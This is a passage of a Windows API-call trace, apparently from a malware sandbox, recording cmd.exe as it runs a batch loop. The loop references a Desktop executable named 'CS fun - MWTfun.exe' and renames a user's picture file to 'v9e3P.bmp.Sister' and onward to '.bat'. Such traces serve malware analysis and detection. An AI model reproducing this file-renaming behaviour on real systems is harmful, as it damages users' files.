lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc84a0 [0294.035] FindClose (in: hFindFile=0x21ed8cc84a0 | out: hFindFile=0x21ed8cc84a0) returned 1 [0294.036] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd9d66aa8, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd9d66aa8, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8cc7a20 [0294.036] FindClose (in: hFindFile=0x21ed8cc7a20 | out: hFindFile=0x21ed8cc7a20) returned 1 [0294.036] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\v9e3P.bmp", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7fef00, ftCreationTime.dwHighDateTime=0x1d5ea2f, ftLastAccessTime.dwLowDateTime=0xb26a7550, ftLastAccessTime.dwHighDateTime=0x1d5eb50, ftLastWriteTime.dwLowDateTime=0xb26a7550, ftLastWriteTime.dwHighDateTime=0x1d5eb50, nFileSizeHigh=0x0, nFileSizeLow=0x115d2, dwReserved0=0x4, dwReserved1=0x7, cFileName="v9e3P.bmp", cAlternateFileName="")) returned 0x21ed8cc7fc0 [0294.036] FindClose (in: hFindFile=0x21ed8cc7fc0 | out: hFindFile=0x21ed8cc7fc0) returned 1 [0294.036] malloc (_Size=0x1ff9c) returned 0x21eda0e0040 [0294.037] ??_V@YAXPEAX@Z () returned 0x21eda0e0040 [0294.038] GetProcessHeap () returned 0x21ed8c70000 [0294.038] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45c20 [0294.038] ??_V@YAXPEAX@Z () returned 0x1 [0294.039] ??_V@YAXPEAX@Z () returned 0x1 [0294.039] GetProcessHeap () returned 0x21ed8c70000 [0294.039] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93904b0, Size=0x110) returned 0x21ed93904b0 [0294.039] GetProcessHeap () returned 0x21ed8c70000 [0294.039] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93904b0) returned 0x110 [0294.039] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0294.039] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.039] GetFileType (hFile=0x50) returned 0x2 [0294.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.039] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0294.040] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.040] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0294.045] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0294.045] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0294.045] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0294.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.045] GetFileType (hFile=0x50) returned 0x2 [0294.045] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.045] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0294.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.045] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0294.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.046] GetFileType (hFile=0x50) returned 0x2 [0294.046] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.046] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0294.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.046] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9390080*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9390080*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0294.047] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"v9e3P.bmp\" \"v9e3P.bmp.Sister\" ") returned 32 [0294.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.047] GetFileType (hFile=0x50) returned 0x2 [0294.047] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.047] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0294.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.047] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0294.048] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0294.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.048] GetFileType (hFile=0x50) returned 0x2 [0294.048] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.048] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0294.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.048] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0294.049] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0294.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.049] GetFileType (hFile=0x50) returned 0x2 [0294.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.049] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0294.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.049] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0294.050] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0294.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.050] GetFileType (hFile=0x50) returned 0x2 [0294.050] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.050] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0294.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.050] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0294.051] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0294.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.051] GetFileType (hFile=0x50) returned 0x2 [0294.051] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.051] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0294.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.051] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0294.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.057] GetFileType (hFile=0x50) returned 0x2 [0294.057] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.057] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0294.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.057] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9390480*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9390480*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0294.058] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"v9e3P.bmp.Sister\" \"v9e3P.bat\" ") returned 32 [0294.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.058] GetFileType (hFile=0x50) returned 0x2 [0294.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.058] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0294.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.058] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0294.059] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0294.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.059] GetFileType (hFile=0x50) returned 0x2 [0294.059] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.059] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0294.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.059] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0294.063] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0294.064] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0294.064] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0294.064] malloc (_Size=0xffce) returned 0x21eda0e0040 [0294.064] ??_V@YAXPEAX@Z () returned 0x21eda0e0040 [0294.064] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0294.064] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0294.064] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0294.064] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0294.064] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0294.064] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0294.064] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0294.064] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0294.064] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0294.064] ??_V@YAXPEAX@Z () returned 0x1 [0294.064] GetProcessHeap () returned 0x21ed8c70000 [0294.064] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d659d0 [0294.064] GetProcessHeap () returned 0x21ed8c70000 [0294.064] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d659d0, Size=0x50) returned 0x21ed8cc7a20 [0294.064] GetProcessHeap () returned 0x21ed8c70000 [0294.065] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc7a20) returned 0x50 [0294.066] GetProcessHeap () returned 0x21ed8c70000 [0294.066] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7ea0 [0294.066] GetProcessHeap () returned 0x21ed8c70000 [0294.066] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d661f0 [0294.067] GetProcessHeap () returned 0x21ed8c70000 [0294.067] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d661f0, Size=0x50) returned 0x21ed8cc84a0 [0294.067] GetProcessHeap () returned 0x21ed8c70000 [0294.067] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc84a0) returned 0x50 [0294.067] malloc (_Size=0xffce) returned 0x21eda0e0040 [0294.067] ??_V@YAXPEAX@Z () returned 0x21eda0e0040 [0294.067] GetProcessHeap () returned 0x21ed8c70000 [0294.067] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7fc0 [0294.067] GetProcessHeap () returned 0x21ed8c70000 [0294.067] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9305790 [0294.067] _wcsicmp (_String1="v9e3P.bmp", _String2=".") returned 72 [0294.067] _wcsicmp (_String1="v9e3P.bmp", _String2="..") returned 72 [0294.067] GetFileAttributesW (lpFileName="v9e3P.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\v9e3p.bmp")) returned 0x20 [0294.068] GetProcessHeap () returned 0x21ed8c70000 [0294.068] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93905d0 [0294.069] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93905e0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0294.069] SetErrorMode (uMode=0x0) returned 0x0 [0294.069] SetErrorMode (uMode=0x1) returned 0x0 [0294.069] GetFullPathNameW (in: lpFileName="v9e3P.bmp", nBufferLength=0x7fe7, lpBuffer=0x21eda0e0040, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\v9e3P.bmp", lpFilePart=0xa6cf4fd660*="v9e3P.bmp") returned 0x22 [0294.069] SetErrorMode (uMode=0x0) returned 0x1 [0294.069] GetProcessHeap () returned 0x21ed8c70000 [0294.069] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93048f0 [0294.069] _wcsicmp (_String1="v9e3P.bmp", _String2=".") returned 72 [0294.069] _wcsicmp (_String1="v9e3P.bmp", _String2="..") returned 72 [0294.069] GetFileAttributesW (lpFileName="v9e3P.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\v9e3p.bmp")) returned 0x20 [0294.070] ??_V@YAXPEAX@Z () returned 0x1 [0294.070] malloc (_Size=0xffce) returned 0x21eda0e0040 [0294.070] ??_V@YAXPEAX@Z () returned 0x21eda0e0040 [0294.070] malloc (_Size=0xffce) returned 0x21eda0f0020 [0294.070] ??_V@YAXPEAX@Z () returned 0x21eda0f0020 [0294.070] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\v9e3P.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\v9e3p.bmp")) returned 0x20 [0294.070] malloc (_Size=0xffce) returned 0x21ed993f900 [0294.070] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0294.070] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\v9e3P.bmp", fInfoLevelId=0x1, lpFindFileData=0x21ed93057a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed93057a0) returned 0x21ed8cc76c0 [0294.071] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0294.071] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0294.071] ??_V@YAXPEAX@Z () returned 0x1 [0294.071] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\v9e3P.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\v9e3p.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\v9e3P.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\v9e3p.bmp.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0294.072] FindNextFileW (in: hFindFile=0x21ed8cc76c0, lpFindFileData=0x21ed93057a0 | out: lpFindFileData=0x21ed93057a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7fef00, ftCreationTime.dwHighDateTime=0x1d5ea2f, ftLastAccessTime.dwLowDateTime=0xb26a7550, ftLastAccessTime.dwHighDateTime=0x1d5eb50, ftLastWriteTime.dwLowDateTime=0xb26a7550, ftLastWriteTime.dwHighDateTime=0x1d5eb50, nFileSizeHigh=0x0, nFileSizeLow=0x115d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="v9e3P.bmp", cAlternateFileName="")) returned 0 [0294.073] GetLastError () returned 0x12 [0294.073] FindClose (in: hFindFile=0x21ed8cc76c0 | out: hFindFile=0x21ed8cc76c0) returned 1 [0294.073] ??_V@YAXPEAX@Z () returned 0x1 [0294.073] ??_V@YAXPEAX@Z () returned 0x1 [0294.073] ??_V@YAXPEAX@Z () returned 0x1 [0294.073] ??_V@YAXPEAX@Z () returned 0x1 [0294.073] GetProcessHeap () returned 0x21ed8c70000 [0294.073] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc8020 [0294.073] GetProcessHeap () returned 0x21ed8c70000 [0294.073] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95840, Size=0x16) returned 0x21ed8c95940 [0294.073] GetProcessHeap () returned 0x21ed8c70000 [0294.073] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95940) returned 0x16 [0294.073] GetProcessHeap () returned 0x21ed8c70000 [0294.073] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45b60, Size=0x20) returned 0x21ed8d45c50 [0294.073] GetProcessHeap () returned 0x21ed8c70000 [0294.073] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45c50) returned 0x20 [0294.073] GetProcessHeap () returned 0x21ed8c70000 [0294.073] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6b6c0 [0294.074] GetProcessHeap () returned 0x21ed8c70000 [0294.074] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b6c0, Size=0xb2) returned 0x21ed937b6f0 [0294.074] GetProcessHeap () returned 0x21ed8c70000 [0294.074] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937b6f0) returned 0xb2 [0294.074] GetProcessHeap () returned 0x21ed8c70000 [0294.074] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93a05c0 [0294.074] GetProcessHeap () returned 0x21ed8c70000 [0294.074] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93a05c0, Size=0x30) returned 0x21ed93a05c0 [0294.074] GetProcessHeap () returned 0x21ed8c70000 [0294.074] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93a05c0) returned 0x30 [0294.074] GetProcessHeap () returned 0x21ed8c70000 [0294.074] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93a0600 [0294.074] malloc (_Size=0x1ff9c) returned 0x21eda0e0040 [0294.075] GetProcessHeap () returned 0x21ed8c70000 [0294.075] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937b7b0 [0294.075] GetProcessHeap () returned 0x21ed8c70000 [0294.075] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937bc30 [0294.075] ??_V@YAXPEAX@Z () returned 0x1 [0294.075] malloc (_Size=0x1ff9c) returned 0x21eda0e0040 [0294.075] GetProcessHeap () returned 0x21ed8c70000 [0294.075] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937bcf0 [0294.075] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda0e0040, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0294.075] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc76c0 [0294.075] FindClose (in: hFindFile=0x21ed8cc76c0 | out: hFindFile=0x21ed8cc76c0) returned 1 [0294.076] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc8080 [0294.076] FindClose (in: hFindFile=0x21ed8cc8080 | out: hFindFile=0x21ed8cc8080) returned 1 [0294.076] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc76c0 [0294.076] FindClose (in: hFindFile=0x21ed8cc76c0 | out: hFindFile=0x21ed8cc76c0) returned 1 [0294.076] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0294.076] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0294.076] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0294.076] GetProcessHeap () returned 0x21ed8c70000 [0294.076] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67a30 [0294.077] ??_V@YAXPEAX@Z () returned 0x1 [0294.077] ??_V@YAXPEAX@Z () returned 0x1 [0294.077] GetProcessHeap () returned 0x21ed8c70000 [0294.077] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93a0600, Size=0x490) returned 0x21ed93a0600 [0294.077] GetProcessHeap () returned 0x21ed8c70000 [0294.077] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93a0600) returned 0x490 [0294.077] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0294.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.077] GetFileType (hFile=0x50) returned 0x2 [0294.077] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.077] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0294.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.078] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0294.091] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0294.092] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0294.092] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0294.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.092] GetFileType (hFile=0x50) returned 0x2 [0294.092] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.092] GetConsoleMode (in: hConsoleHandle=0x50, 